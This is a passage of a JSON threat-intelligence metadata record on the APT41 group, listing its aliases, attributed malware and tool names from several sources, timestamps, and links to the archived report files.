		"https://medium.com/@DCSO_CyTec/apt41-the-spy-who-failed-to-encrypt-me-24fc0f49cad1"
	],
	"report_names": [
		"apt41-the-spy-who-failed-to-encrypt-me-24fc0f49cad1"
	],
	"threat_actors": [
		{
			"id": "c7d9878a-e691-4c6f-81ae-84fb115a1345",
			"created_at": "2022-10-25T16:07:23.359506Z",
			"updated_at": "2026-04-10T02:00:04.556639Z",
			"deleted_at": null,
			"main_name": "APT 41",
			"aliases": [
				"BrazenBamboo",
				"Bronze Atlas",
				"Double Dragon",
				"Earth Baku",
				"G0096",
				"Grayfly",
				"Operation ColunmTK",
				"Operation CuckooBees",
				"Operation ShadowHammer",
				"Red Kelpie",
				"SparklingGoblin",
				"TA415",
				"TG-2633"
			],
			"source_name": "ETDA:APT 41",
			"tools": [
				"9002 RAT",
				"ADORE.XSEC",
				"ASPXSpy",
				"ASPXTool",
				"AceHash",
				"Agent.dhwf",
				"Agentemis",
				"AndroidControl",
				"AngryRebel",
				"AntSword",
				"BLUEBEAM",
				"Barlaiy",
				"BlackCoffee",
				"Bladabindi",
				"BleDoor",
				"CCleaner Backdoor",
				"CHINACHOPPER",
				"COLDJAVA",
				"China Chopper",
				"ChyNode",
				"Cobalt Strike",
				"CobaltStrike",
				"Crackshot",
				"CrossWalk",
				"CurveLast",
				"CurveLoad",
				"DAYJOB",
				"DBoxAgent",
				"DEADEYE",
				"DEADEYE.APPEND",
				"DEADEYE.EMBED",
				"DEPLOYLOG",
				"DIRTCLEANER",
				"DUSTTRAP",
				"Derusbi",
				"Destroy RAT",
				"DestroyRAT",
				"DodgeBox",
				"DragonEgg",
				"ELFSHELF",
				"EasyNight",
				"Farfli",
				"FunnySwitch",
				"Gh0st RAT",
				"Ghost RAT",
				"HDD Rootkit",
				"HDRoot",
				"HKDOOR",
				"HOMEUNIX",
				"HUI Loader",
				"HidraQ",
				"HighNoon",
				"HighNote",
				"Homux",
				"Hydraq",
				"Jorik",
				"Jumpall",
				"KEYPLUG",
				"Kaba",
				"Korplug",
				"LATELUNCH",
				"LOLBAS",
				"LOLBins",
				"LightSpy",
				"Living off the Land",
				"Lowkey",
				"McRAT",
				"MdmBot",
				"MessageTap",
				"Meterpreter",
				"Mimikatz",
				"MoonBounce",
				"MoonWalk",
				"Motnug",
				"Moudour",
				"Mydoor",
				"NTDSDump",
				"PACMAN",
				"PCRat",
				"PINEGROVE",
				"PNGRAT",
				"POISONPLUG",
				"POISONPLUG.SHADOW",
				"POTROAST",
				"PRIVATELOG",
				"PipeMon",
				"PlugX",
				"PortReuse",
				"ProxIP",
				"ROCKBOOT",
				"RbDoor",
				"RedDelta",
				"RedXOR",
				"RibDoor",
				"Roarur",
				"RouterGod",
				"SAGEHIRE",
				"SPARKLOG",
				"SQLULDR2",
				"STASHLOG",
				"SWEETCANDLE",
				"ScrambleCross",
				"Sensocode",
				"SerialVlogger",
				"ShadowHammer",
				"ShadowPad Winnti",
				"SinoChopper",
				"Skip-2.0",
				"SneakCross",
				"Sogu",
				"Speculoos",
				"Spyder",
				"StealthReacher",
				"StealthVector",
				"TERA",
				"TIDYELF",
				"TIGERPLUG",
				"TOMMYGUN",
				"TVT",
				"Thoper",
				"Voldemort",
				"WIDETONE",
				"WINNKIT",
				"WINTERLOVE",
				"Winnti",
				"WyrmSpy",
				"X-Door",
				"XDOOR",
				"XMRig",
				"XShellGhost",
				"Xamtrav",
				"ZXShell",
				"ZoxPNG",
				"certutil",
				"certutil.exe",
				"cobeacon",
				"gresim",
				"njRAT",
				"pwdump",
				"xDll"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "4d5f939b-aea9-4a0e-8bff-003079a261ea",
			"created_at": "2023-01-06T13:46:39.04841Z",
			"updated_at": "2026-04-10T02:00:03.196806Z",
			"deleted_at": null,
			"main_name": "APT41",
			"aliases": [
				"WICKED PANDA",
				"BRONZE EXPORT",
				"Brass Typhoon",
				"TG-2633",
				"Leopard Typhoon",
				"G0096",
				"Grayfly",
				"BARIUM",
				"BRONZE ATLAS",
				"Red Kelpie",
				"G0044",
				"Earth Baku",
				"TA415",
				"WICKED SPIDER",
				"HOODOO",
				"Winnti",
				"Double Dragon"
			],
			"source_name": "MISPGALAXY:APT41",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e698860d-57e8-4780-b7c3-41e5a8314ec0",
			"created_at": "2022-10-25T15:50:23.287929Z",
			"updated_at": "2026-04-10T02:00:05.329769Z",
			"deleted_at": null,
			"main_name": "APT41",
			"aliases": [
				"APT41",
				"Wicked Panda",
				"Brass Typhoon",
				"BARIUM"
			],
			"source_name": "MITRE:APT41",
			"tools": [
				"ASPXSpy",
				"BITSAdmin",
				"PlugX",
				"Impacket",
				"gh0st RAT",
				"netstat",
				"PowerSploit",
				"ZxShell",
				"KEYPLUG",
				"LightSpy",
				"ipconfig",
				"sqlmap",
				"China Chopper",
				"ShadowPad",
				"MESSAGETAP",
				"Mimikatz",
				"certutil",
				"njRAT",
				"Cobalt Strike",
				"pwdump",
				"BLACKCOFFEE",
				"MOPSLED",
				"ROCKBOOT",
				"dsquery",
				"Winnti for Linux",
				"DUSTTRAP",
				"Derusbi",
				"ftp"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "2a24d664-6a72-4b4c-9f54-1553b64c453c",
			"created_at": "2025-08-07T02:03:24.553048Z",
			"updated_at": "2026-04-10T02:00:03.787296Z",
			"deleted_at": null,
			"main_name": "BRONZE ATLAS",
			"aliases": [
				"APT41 ",
				"BARIUM ",
				"Blackfly ",
				"Brass Typhoon",
				"CTG-2633",
				"Earth Baku ",
				"GREF",
				"Group 72 ",
				"Red Kelpie ",
				"TA415 ",
				"TG-2633 ",
				"Wicked Panda ",
				"Winnti"
			],
			"source_name": "Secureworks:BRONZE ATLAS",
			"tools": [
				"Acehash",
				"CCleaner v5.33 backdoor",
				"ChinaChopper",
				"Cobalt Strike",
				"DUSTPAN",
				"Dicey MSDN",
				"Dodgebox",
				"ForkPlayground",
				"HUC Proxy Malware (Htran)"
			],
			"source_id": "Secureworks",
			"reports": null
		}
	],
	"ts_created_at": 1775434248,
	"ts_updated_at": 1775826727,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/6767fd3af527538ea0892fb48215fc6b1a17fc1d.pdf",
		"text": "https://archive.orkl.eu/6767fd3af527538ea0892fb48215fc6b1a17fc1d.txt",
		"img": "https://archive.orkl.eu/6767fd3af527538ea0892fb48215fc6b1a17fc1d.jpg"
	}
}